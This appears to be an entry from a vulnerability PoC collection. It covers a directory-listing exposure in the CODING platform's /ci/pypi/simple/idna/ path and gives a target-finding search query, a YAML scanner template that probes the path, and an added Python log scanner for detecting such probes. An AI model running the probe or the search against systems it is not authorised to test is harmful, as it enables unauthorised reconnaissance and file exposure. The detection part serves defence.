2023Hvv/CODING平台idna目录存在目录遍历漏洞.md
2023-08-16 17:47:36 +08:00

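CODing.net is a cloud-based development platform for developers that provides Git/SVN code hosting and task management. Its idna directory has a directory disclosure vulnerability that lets an attacker obtain directory and file information.

Search query: title="一站式软件研发管理平台"

PoC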
```
relative: req0
session: false
requests:
- method: GET
  timeout: 10
  path: /ci/pypi/simple/idna/
  headers:
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36
  follow_redirects: true
  matches: (code.eq("200") && body.contains("Index of"))
```
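
For operators of an affected instance, the following added example (not part of the original file) scans web access logs for requests to the path used in the PoC and reports whether they were answered with a 200. It assumes the combined log format; the sample log lines and IP addresses are constructed, and the function names are hypothetical.

```python
import re

# Path and User-Agent copied from the PoC on this page.
POC_PATH = "/ci/pypi/simple/idna/"
POC_UA = ("Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36")

# Assumed format: ip - user [time] "METHOD path proto" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return a dict for a request to the PoC path, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path = m["path"].split("?", 1)[0]
    # The PoC follows redirects, so treat the slash-less form as the same probe.
    if path.rstrip("/") != POC_PATH.rstrip("/"):
        return None
    return {
        "ip": m["ip"],
        "time": m["time"],
        "status": int(m["status"]),
        # A 200 is only half of the PoC's match; the body must still be checked
        # for "Index of" on the server itself, since logs do not record bodies.
        "served_200": m["status"] == "200",
        "poc_ua": m["ua"] == POC_UA,
    }

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    f'203.0.113.7 - - [16/Aug/2023:10:01:02 +0800] "GET /ci/pypi/simple/idna/ HTTP/1.1" 200 512 "-" "{POC_UA}"',
    '198.51.100.9 - - [16/Aug/2023:10:05:40 +0800] "GET /ci/pypi/simple/idna HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.9 - - [16/Aug/2023:10:05:41 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with `served_200` set is a prompt to check what that URL actually returns on the instance and to review what the listing exposed.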